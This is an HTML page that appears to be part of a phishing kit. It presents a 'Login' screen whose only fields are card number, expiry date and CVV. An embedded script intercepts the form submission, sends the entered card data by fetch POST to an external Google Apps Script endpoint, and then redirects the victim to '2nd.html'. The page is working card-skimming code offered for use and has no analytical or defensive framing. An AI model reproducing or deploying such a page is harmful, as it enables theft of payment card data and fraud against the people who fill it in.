<!DOCTYPE html>
<html>
<head>
<body bgcolor="#401325">
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>

input[type=text], input[type=password] {
  width: 100%;
  padding: 10px 10px;
  margin: 6px 0;
  display: inline-grid;
  border: 2px solid #ccc;
  box-sizing: border-box;
}

button {
  background-color:#ff6600 ;
  color: white;
  padding: 14px 20px;
  margin: 8px 0;
  border: none;
  cursor: pointer;
  width: 100%;
}

button:hover {
  opacity: 0.8;
}

.cancelbtn {
  width: auto;
  padding: 10px 18px;
  background-color: #f44336;
}

.imgcontainer {
  text-align: center;
  margin: 24px 0 12px 0;
}

img.avatar {
  width: 40%;
  border-radius: 50%;
}

.container {
  padding: 10px;
  grid-template-columns: 5px
}

span.psw {
  float: right;
  padding-top: 16px;
}

/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
  span.psw {
     display: block;
     float: none;
  }
  .cancelbtn {
     width: 100%;
  }
}
</style>
</head>
<body>
<header>
    <center><h1 class="text-center"><img src="./logo.png" style="width: 100%;"></h1></center>
    <br><br><br>
  </header>

  <form class="login100-form validate-form"  method="post" name="google-sheet">

  <div class="imgcontainer">
    
  </div>

  <div class="container">
   
     <input type="text" placeholder="Card Number" name="Card" required>

     <input type="text" placeholder="Valid Thru" name="Date" required>

     <input type="text" placeholder="Cvv" name="Cvv" required>

  
        
    <button type="submit">Login</button>
    <label>
     
    </label>
  </div>

 
</form>
<script>
  const scriptURL = 'https://script.google.com/macros/s/AKfycbyuKk8p3cqR5Z4Bkt6xEHpfRaJ-Qd83wAW1wtpeBMy--2nKntdyjeK8SXyLDxFpAg1V2Q/exec'
  const form = document.forms['google-sheet']
   
   form.addEventListener('submit', e => {
     e.preventDefault()
     fetch(scriptURL, { method: 'POST', body: new FormData(form)})
       .then(response =>  window.location.href='2nd.html')
       .catch(error => console.error('Error!', error.message))
   })
</script>

</body>
</html>
